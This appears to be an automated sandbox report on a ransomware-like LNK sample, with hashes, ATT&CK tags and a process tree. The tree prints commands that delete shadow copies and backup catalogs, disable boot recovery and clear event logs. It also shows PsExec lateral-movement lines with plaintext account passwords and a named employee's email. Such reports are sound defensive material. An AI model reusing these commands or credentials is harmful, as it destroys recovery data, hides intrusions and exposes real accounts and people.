evilnum | 0d878b1b9f5c1ae8925e55df9e10b4271eb99970af133e251830044d24296ba8

Analysis

max time kernel
152s
max time network
155s
platform
windows10_x64
resource
win10v20201028
submitted
26-12-2020 20:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

83c375dcdadb8467955f5e124cf4e8d6eac78c51c03fb7393dc810a243ba1a90.lnk
Size

938KB
MD5

fc00819c4cdc8609313041cf345a7dca
SHA1

3cb2d94e7a3b6d6141106e3973189e06306ce2f0
SHA256

83c375dcdadb8467955f5e124cf4e8d6eac78c51c03fb7393dc810a243ba1a90
SHA512

53b2761be2a805aa6cdc7857b70da8b25ccf0990dc1f9a6501ed73af9909db6a58667b9bcd786c9acc19309b18bc228ac02d3ebe97063b1cf6bf2362c935131c

Score

10^/10

evilnum evasion ransomware trojan

Malware Config

Signatures

Evilnum
A malware family with multiple components distributed through LNK files.
trojan evilnum
Clears Windows event logs 1 TTPs
evasion ransomware

Indicator Removal on Host
T1070
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
ransomware evasion

Inhibit System Recovery
T1490

Processes:

bcdedit.exebcdedit.exe

pid process

3388 bcdedit.exe
2680 bcdedit.exe
Deletes backup catalog 3 TTPs 1 IoCs
Uses wbadmin.exe to inhibit system recovery.
ransomware

Command-Line Interface
T1059

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

wbadmin.exe

pid process

1256 wbadmin.exe

pid	process
3388	bcdedit.exe
2680	bcdedit.exe

pid	process
1256	wbadmin.exe

Executes dropped EXE 16 IoCs

Processes:

xgjyg.exe_wou.exe_hrr.exe_hrr.exe_hrr.exe_hrr.exe_hrr.exePSEXESVC.exe_hrr.exe_hrr.exe_wbf.exe_hrr.exe_hrr.exe_hrr.exe_hrr.exe_hrr.exe

pid	process
4048	xgjyg.exe
4368	_wou.exe
680	_hrr.exe
364	_hrr.exe
856	_hrr.exe
904	_hrr.exe
1136	_hrr.exe
3116	PSEXESVC.exe
2512	_hrr.exe
4260	_hrr.exe
4312	_wbf.exe
4316	_hrr.exe
1168	_hrr.exe
4712	_hrr.exe
4588	_hrr.exe
5096	_hrr.exe

Drops file in Windows directory 3 IoCs

Processes:

_hrr.exe_hrr.exe_hrr.exe

description	ioc	process
File opened for modification	C:\Windows\PSEXESVC.exe	_hrr.exe
File created	C:\Windows\PSEXESVC.exe	_hrr.exe
File created	C:\Windows\PSEXESVC.exe	_hrr.exe

Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

vssadmin.exe

pid process

416 vssadmin.exe

pid	process
416	vssadmin.exe

Modifies data under HKEY_USERS 24 IoCs

Processes:

_hrr.exe_hrr.exe_hrr.exe_hrr.exe_hrr.exe_hrr.exe_hrr.exe_hrr.exe_hrr.exe_hrr.exe_hrr.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_hrr.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_hrr.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_hrr.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_hrr.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	_hrr.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals	_hrr.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_hrr.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_hrr.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_hrr.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_hrr.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_hrr.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_hrr.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_hrr.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_hrr.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_hrr.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_hrr.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_hrr.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_hrr.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_hrr.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_hrr.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_hrr.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_hrr.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_hrr.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_hrr.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

xgjyg.exe

pid process

4048 xgjyg.exe
4048 xgjyg.exe
4048 xgjyg.exe
4048 xgjyg.exe
4048 xgjyg.exe
4048 xgjyg.exe

Suspicious use of AdjustPrivilegeToken 32 IoCs

Processes:

_ftf.exexgjyg.exe_wou.exevssvc.exewbengine.exe_wbf.exe

description	pid	process
Token: SeAssignPrimaryTokenPrivilege	3964	_ftf.exe
Token: SeIncreaseQuotaPrivilege	3964	_ftf.exe
Token: SeSecurityPrivilege	3964	_ftf.exe
Token: SeTakeOwnershipPrivilege	3964	_ftf.exe
Token: SeLoadDriverPrivilege	3964	_ftf.exe
Token: SeSystemtimePrivilege	3964	_ftf.exe
Token: SeBackupPrivilege	3964	_ftf.exe
Token: SeRestorePrivilege	3964	_ftf.exe
Token: SeShutdownPrivilege	3964	_ftf.exe
Token: SeSystemEnvironmentPrivilege	3964	_ftf.exe
Token: SeUndockPrivilege	3964	_ftf.exe
Token: SeManageVolumePrivilege	3964	_ftf.exe
Token: SeDebugPrivilege	4048	xgjyg.exe
Token: SeShutdownPrivilege	4368	_wou.exe
Token: SeBackupPrivilege	1056	vssvc.exe
Token: SeRestorePrivilege	1056	vssvc.exe
Token: SeAuditPrivilege	1056	vssvc.exe
Token: SeBackupPrivilege	1100	wbengine.exe
Token: SeRestorePrivilege	1100	wbengine.exe
Token: SeSecurityPrivilege	1100	wbengine.exe
Token: SeAssignPrimaryTokenPrivilege	4312	_wbf.exe
Token: SeIncreaseQuotaPrivilege	4312	_wbf.exe
Token: SeSecurityPrivilege	4312	_wbf.exe
Token: SeTakeOwnershipPrivilege	4312	_wbf.exe
Token: SeLoadDriverPrivilege	4312	_wbf.exe
Token: SeSystemtimePrivilege	4312	_wbf.exe
Token: SeBackupPrivilege	4312	_wbf.exe
Token: SeRestorePrivilege	4312	_wbf.exe
Token: SeShutdownPrivilege	4312	_wbf.exe
Token: SeSystemEnvironmentPrivilege	4312	_wbf.exe
Token: SeUndockPrivilege	4312	_wbf.exe
Token: SeManageVolumePrivilege	4312	_wbf.exe

Suspicious use of WriteProcessMemory 68 IoCs

Processes:

cmd.execmd.exePSEXESVC.exe_ftf.exe_wou.execmd.execmd.exePSEXESVC.exe_wbf.exe

description	pid	process	target process
PID 4660 wrote to memory of 5104	4660	cmd.exe	cmd.exe
PID 4660 wrote to memory of 5104	4660	cmd.exe	cmd.exe
PID 5104 wrote to memory of 4140	5104	cmd.exe	cmd.exe
PID 5104 wrote to memory of 4140	5104	cmd.exe	cmd.exe
PID 5104 wrote to memory of 2164	5104	cmd.exe	find.exe
PID 5104 wrote to memory of 2164	5104	cmd.exe	find.exe
PID 5104 wrote to memory of 1832	5104	cmd.exe	wscript.exe
PID 5104 wrote to memory of 1832	5104	cmd.exe	wscript.exe
PID 3132 wrote to memory of 3964	3132	PSEXESVC.exe	_ftf.exe
PID 3132 wrote to memory of 3964	3132	PSEXESVC.exe	_ftf.exe
PID 3132 wrote to memory of 3964	3132	PSEXESVC.exe	_ftf.exe
PID 3964 wrote to memory of 4048	3964	_ftf.exe	xgjyg.exe
PID 3964 wrote to memory of 4048	3964	_ftf.exe	xgjyg.exe
PID 3964 wrote to memory of 4368	3964	_ftf.exe	_wou.exe
PID 3964 wrote to memory of 4368	3964	_ftf.exe	_wou.exe
PID 3964 wrote to memory of 4368	3964	_ftf.exe	_wou.exe
PID 4368 wrote to memory of 4416	4368	_wou.exe	cmd.exe
PID 4368 wrote to memory of 4416	4368	_wou.exe	cmd.exe
PID 4416 wrote to memory of 416	4416	cmd.exe	vssadmin.exe
PID 4416 wrote to memory of 416	4416	cmd.exe	vssadmin.exe
PID 3964 wrote to memory of 904	3964	_ftf.exe	_hrr.exe
PID 3964 wrote to memory of 904	3964	_ftf.exe	_hrr.exe
PID 3964 wrote to memory of 904	3964	_ftf.exe	_hrr.exe
PID 3964 wrote to memory of 856	3964	_ftf.exe	_hrr.exe
PID 3964 wrote to memory of 856	3964	_ftf.exe	_hrr.exe
PID 3964 wrote to memory of 856	3964	_ftf.exe	_hrr.exe
PID 3964 wrote to memory of 364	3964	_ftf.exe	_hrr.exe
PID 3964 wrote to memory of 364	3964	_ftf.exe	_hrr.exe
PID 3964 wrote to memory of 364	3964	_ftf.exe	_hrr.exe
PID 3964 wrote to memory of 680	3964	_ftf.exe	_hrr.exe
PID 3964 wrote to memory of 680	3964	_ftf.exe	_hrr.exe
PID 3964 wrote to memory of 680	3964	_ftf.exe	_hrr.exe
PID 3964 wrote to memory of 1136	3964	_ftf.exe	_hrr.exe
PID 3964 wrote to memory of 1136	3964	_ftf.exe	_hrr.exe
PID 3964 wrote to memory of 1136	3964	_ftf.exe	_hrr.exe
PID 3964 wrote to memory of 2512	3964	_ftf.exe	_hrr.exe
PID 3964 wrote to memory of 2512	3964	_ftf.exe	_hrr.exe
PID 3964 wrote to memory of 2512	3964	_ftf.exe	_hrr.exe
PID 4368 wrote to memory of 4512	4368	_wou.exe	cmd.exe
PID 4368 wrote to memory of 4512	4368	_wou.exe	cmd.exe
PID 3964 wrote to memory of 4260	3964	_ftf.exe	_hrr.exe
PID 3964 wrote to memory of 4260	3964	_ftf.exe	_hrr.exe
PID 3964 wrote to memory of 4260	3964	_ftf.exe	_hrr.exe
PID 4512 wrote to memory of 1256	4512	cmd.exe	wbadmin.exe
PID 4512 wrote to memory of 1256	4512	cmd.exe	wbadmin.exe
PID 3964 wrote to memory of 1168	3964	_ftf.exe	_hrr.exe
PID 3964 wrote to memory of 1168	3964	_ftf.exe	_hrr.exe
PID 3964 wrote to memory of 1168	3964	_ftf.exe	_hrr.exe
PID 3964 wrote to memory of 4316	3964	_ftf.exe	_hrr.exe
PID 3964 wrote to memory of 4316	3964	_ftf.exe	_hrr.exe
PID 3964 wrote to memory of 4316	3964	_ftf.exe	_hrr.exe
PID 3116 wrote to memory of 4312	3116	PSEXESVC.exe	_wbf.exe
PID 3116 wrote to memory of 4312	3116	PSEXESVC.exe	_wbf.exe
PID 3116 wrote to memory of 4312	3116	PSEXESVC.exe	_wbf.exe
PID 3964 wrote to memory of 4712	3964	_ftf.exe	_hrr.exe
PID 3964 wrote to memory of 4712	3964	_ftf.exe	_hrr.exe
PID 3964 wrote to memory of 4712	3964	_ftf.exe	_hrr.exe
PID 3964 wrote to memory of 4588	3964	_ftf.exe	_hrr.exe
PID 3964 wrote to memory of 4588	3964	_ftf.exe	_hrr.exe
PID 3964 wrote to memory of 4588	3964	_ftf.exe	_hrr.exe
PID 4312 wrote to memory of 2616	4312	_wbf.exe	notepad.exe
PID 4312 wrote to memory of 2616	4312	_wbf.exe	notepad.exe
PID 4312 wrote to memory of 2616	4312	_wbf.exe	notepad.exe
PID 4312 wrote to memory of 2616	4312	_wbf.exe	notepad.exe

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\83c375dcdadb8467955f5e124cf4e8d6eac78c51c03fb7393dc810a243ba1a90.lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:4660

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c path=C:\Windows\system32&move "VerificationDocuments.pdf.lnk " "C:\Users\Admin\AppData\Local\Temp\1.lnk"&type "C:\Users\Admin\AppData\Local\Temp\1.lnk"|find "END2">"C:\Users\Admin\AppData\Local\Temp\0.js"&wscript "C:\Users\Admin\AppData\Local\Temp\0.js"
2⤵
- Suspicious use of WriteProcessMemory
PID:5104

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" type "C:\Users\Admin\AppData\Local\Temp\1.lnk""
3⤵
PID:4140

C:\Windows\system32\find.exe
find "END2"
3⤵
PID:2164

C:\Windows\system32\wscript.exe
wscript "C:\Users\Admin\AppData\Local\Temp\0.js"
3⤵
PID:1832

C:\Windows\PSEXESVC.exe
C:\Windows\PSEXESVC.exe
1⤵
- Suspicious use of WriteProcessMemory
PID:3132

C:\Windows\_ftf.exe
"_ftf.exe"
2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3964

C:\Windows\TEMP\xgjyg.exe
123 \\.\pipe\1C5B7CCF-9C2E-43EA-A899-D95FFFAA9233
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4048

C:\Windows\TEMP\_wou.exe
"C:\Windows\TEMP\_wou.exe"
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4368

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c c:\Windows\system32\vssadmin.exe delete shadows /all /quiet
4⤵
- Suspicious use of WriteProcessMemory
PID:4416

\??\c:\Windows\system32\vssadmin.exe
c:\Windows\system32\vssadmin.exe delete shadows /all /quiet
5⤵
- Interacts with shadow copies
PID:416

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wbadmin.exe delete catalog -quiet
4⤵
- Suspicious use of WriteProcessMemory
PID:4512

C:\Windows\system32\wbadmin.exe
wbadmin.exe delete catalog -quiet
5⤵
- Deletes backup catalog
PID:1256

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
4⤵
PID:4200

C:\Windows\system32\bcdedit.exe
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
5⤵
- Modifies boot configuration data using bcdedit
PID:3388

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} recoveryenabled no
5⤵
- Modifies boot configuration data using bcdedit
PID:2680

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wevtutil.exe cl System
4⤵
PID:988

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl System
5⤵
PID:5100

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wevtutil.exe cl Security
4⤵
PID:4072

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl Security
5⤵
PID:1492

C:\Windows\TEMP\_hrr.exe
C:\Windows\TEMP\_hrr.exe \\Ewycradz -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_wbf.exe"
3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:904

C:\Windows\TEMP\_hrr.exe
C:\Windows\TEMP\_hrr.exe \\Ewycradz -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_wbf.exe"
3⤵
- Executes dropped EXE
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:856

C:\Windows\TEMP\_hrr.exe
C:\Windows\TEMP\_hrr.exe \\Ewycradz -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_wbf.exe"
3⤵
- Executes dropped EXE
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:680

C:\Windows\TEMP\_hrr.exe
C:\Windows\TEMP\_hrr.exe \\Ewycradz -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_wbf.exe"
3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:364

C:\Windows\TEMP\_hrr.exe
C:\Windows\TEMP\_hrr.exe \\Ewycradz -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_wbf.exe"
3⤵
- Executes dropped EXE
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:1136

C:\Windows\TEMP\_hrr.exe
C:\Windows\TEMP\_hrr.exe \\255.255.255.255 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_wbf.exe"
3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:2512

C:\Windows\TEMP\_hrr.exe
C:\Windows\TEMP\_hrr.exe \\255.255.255.255 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_wbf.exe"
3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:4260

C:\Windows\TEMP\_hrr.exe
C:\Windows\TEMP\_hrr.exe \\10.10.0.88 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_wbf.exe"
3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:1168

C:\Windows\TEMP\_hrr.exe
C:\Windows\TEMP\_hrr.exe \\10.10.0.66 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_wbf.exe"
3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:4316

C:\Windows\TEMP\_hrr.exe
C:\Windows\TEMP\_hrr.exe \\10.10.0.74 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_wbf.exe"
3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:4712

C:\Windows\TEMP\_hrr.exe
C:\Windows\TEMP\_hrr.exe \\10.10.0.80 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_wbf.exe"
3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:4588

C:\Windows\TEMP\_hrr.exe
C:\Windows\TEMP\_hrr.exe \\10.10.0.255 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_wbf.exe"
3⤵
- Executes dropped EXE
PID:5096

C:\Windows\TEMP\_hrr.exe
C:\Windows\TEMP\_hrr.exe \\255.255.255.255 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_wbf.exe"
3⤵
PID:3436

C:\Windows\TEMP\_hrr.exe
C:\Windows\TEMP\_hrr.exe \\Ewycradz -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_wbf.exe"
3⤵
PID:3988

C:\Windows\TEMP\_hrr.exe
C:\Windows\TEMP\_hrr.exe \\Ewycradz -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_wbf.exe"
3⤵
PID:4080

C:\Windows\TEMP\_hrr.exe
C:\Windows\TEMP\_hrr.exe \\Ewycradz -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_wbf.exe"
3⤵
PID:3840

C:\Windows\TEMP\_hrr.exe
C:\Windows\TEMP\_hrr.exe \\255.255.255.255 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_wbf.exe"
3⤵
PID:4828

C:\Windows\TEMP\_hrr.exe
C:\Windows\TEMP\_hrr.exe \\10.10.0.255 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_wbf.exe"
3⤵
PID:4348

C:\Windows\TEMP\_hrr.exe
C:\Windows\TEMP\_hrr.exe \\Ewycradz -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_wbf.exe"
3⤵
PID:2852

C:\Windows\TEMP\_hrr.exe
C:\Windows\TEMP\_hrr.exe \\10.10.0.80 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_wbf.exe"
3⤵
PID:4432

C:\Windows\TEMP\_hrr.exe
C:\Windows\TEMP\_hrr.exe \\10.10.0.88 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_wbf.exe"
3⤵
PID:2876

C:\Windows\TEMP\_hrr.exe
C:\Windows\TEMP\_hrr.exe \\255.255.255.255 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Windows\TEMP\_wbf.exe"
3⤵
PID:4532

C:\Windows\TEMP\_hrr.exe
C:\Windows\TEMP\_hrr.exe \\255.255.255.255 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Windows\TEMP\_wbf.exe"
3⤵
PID:4476

C:\Windows\TEMP\_hrr.exe
C:\Windows\TEMP\_hrr.exe \\Ewycradz -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Windows\TEMP\_wbf.exe"
3⤵
PID:1824

C:\Windows\TEMP\_hrr.exe
C:\Windows\TEMP\_hrr.exe \\Ewycradz -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Windows\TEMP\_wbf.exe"
3⤵
PID:1016

C:\Windows\TEMP\_hrr.exe
C:\Windows\TEMP\_hrr.exe \\igmp.mcast.net -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_wbf.exe"
3⤵
PID:2668

C:\Windows\TEMP\_hrr.exe
C:\Windows\TEMP\_hrr.exe \\224.0.0.252 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_wbf.exe"
3⤵
PID:4056

C:\Windows\TEMP\_hrr.exe
C:\Windows\TEMP\_hrr.exe \\255.255.255.255 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_wbf.exe"
3⤵
PID:3688

C:\Windows\TEMP\_hrr.exe
C:\Windows\TEMP\_hrr.exe \\10.10.0.80 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Windows\TEMP\_wbf.exe"
3⤵
PID:3432

C:\Windows\TEMP\_hrr.exe
C:\Windows\TEMP\_hrr.exe \\255.255.255.255 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_wbf.exe"
3⤵
PID:4808

C:\Windows\TEMP\_hrr.exe
C:\Windows\TEMP\_hrr.exe \\224.0.0.252 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_wbf.exe"
3⤵
PID:4684

C:\Windows\TEMP\_hrr.exe
C:\Windows\TEMP\_hrr.exe \\Ewycradz -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_wbf.exe"
3⤵
PID:3180

C:\Windows\TEMP\_hrr.exe
C:\Windows\TEMP\_hrr.exe \\10.10.0.255 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_wbf.exe"
3⤵
PID:5092

C:\Windows\TEMP\_hrr.exe
C:\Windows\TEMP\_hrr.exe \\224.0.0.22 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_wbf.exe"
3⤵
PID:4912

C:\Windows\TEMP\_hrr.exe
C:\Windows\TEMP\_hrr.exe \\255.255.255.255 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_wbf.exe"
3⤵
PID:420

C:\Windows\TEMP\_hrr.exe
C:\Windows\TEMP\_hrr.exe \\10.10.0.255 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_wbf.exe"
3⤵
PID:1640

C:\Windows\TEMP\_hrr.exe
C:\Windows\TEMP\_hrr.exe \\239.255.255.250 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_wbf.exe"
3⤵
PID:1216

C:\Windows\TEMP\_hrr.exe
C:\Windows\TEMP\_hrr.exe \\255.255.255.255 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_wbf.exe"
3⤵
PID:4388

C:\Windows\TEMP\_hrr.exe
C:\Windows\TEMP\_hrr.exe \\239.255.255.250 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_wbf.exe"
3⤵
PID:1860

C:\Windows\TEMP\_hrr.exe
C:\Windows\TEMP\_hrr.exe \\igmp.mcast.net -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_wbf.exe"
3⤵
PID:4028

C:\Windows\TEMP\_hrr.exe
C:\Windows\TEMP\_hrr.exe \\255.255.255.255 -u "MicrosoftOffice16_Data:SSPI:elena.samokhvalova@atos.net\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_wbf.exe"
3⤵
PID:4856

C:\Windows\TEMP\_hrr.exe
C:\Windows\TEMP\_hrr.exe \\224.0.0.22 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_wbf.exe"
3⤵
PID:4612

C:\Windows\TEMP\_hrr.exe
C:\Windows\TEMP\_hrr.exe \\255.255.255.255 -u "MicrosoftOffice16_Data:SSPI:elena.samokhvalova@atos.net\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_wbf.exe"
3⤵
PID:1340

C:\Windows\TEMP\_hrr.exe
C:\Windows\TEMP\_hrr.exe \\224.0.0.252 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_wbf.exe"
3⤵
PID:1584

C:\Windows\TEMP\_hrr.exe
C:\Windows\TEMP\_hrr.exe \\igmp.mcast.net -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Windows\TEMP\_wbf.exe"
3⤵
PID:2404

C:\Windows\TEMP\_hrr.exe
C:\Windows\TEMP\_hrr.exe \\10.10.0.80 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_wbf.exe"
3⤵
PID:4428

C:\Windows\TEMP\_hrr.exe
C:\Windows\TEMP\_hrr.exe \\224.0.0.252 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_wbf.exe"
3⤵
PID:812

C:\Windows\TEMP\_hrr.exe
C:\Windows\TEMP\_hrr.exe \\224.0.0.22 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Windows\TEMP\_wbf.exe"
3⤵
PID:5008

C:\Windows\TEMP\_hrr.exe
C:\Windows\TEMP\_hrr.exe \\255.255.255.255 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Windows\TEMP\_wbf.exe"
3⤵
PID:2156

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1056

C:\Windows\PSEXESVC.exe
C:\Windows\PSEXESVC.exe
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3116

C:\Windows\_wbf.exe
"_wbf.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4312

C:\Windows\SysWOW64\notepad.exe
"C:\Windows\system32\notepad.exe"
3⤵
PID:2616

C:\Windows\system32\wbengine.exe
"C:\Windows\system32\wbengine.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1100

C:\Windows\System32\vdsldr.exe
C:\Windows\System32\vdsldr.exe -Embedding
1⤵
PID:1768

C:\Windows\System32\vds.exe
C:\Windows\System32\vds.exe
1⤵
PID:4776

C:\Windows\PSEXESVC.exe
C:\Windows\PSEXESVC.exe
1⤵
PID:4204

C:\Windows\_wbf.exe
"_wbf.exe"
2⤵
PID:584

C:\Windows\SysWOW64\notepad.exe
"C:\Windows\system32\notepad.exe"
3⤵
PID:4400

C:\Windows\_wbf.exe
"_wbf.exe"
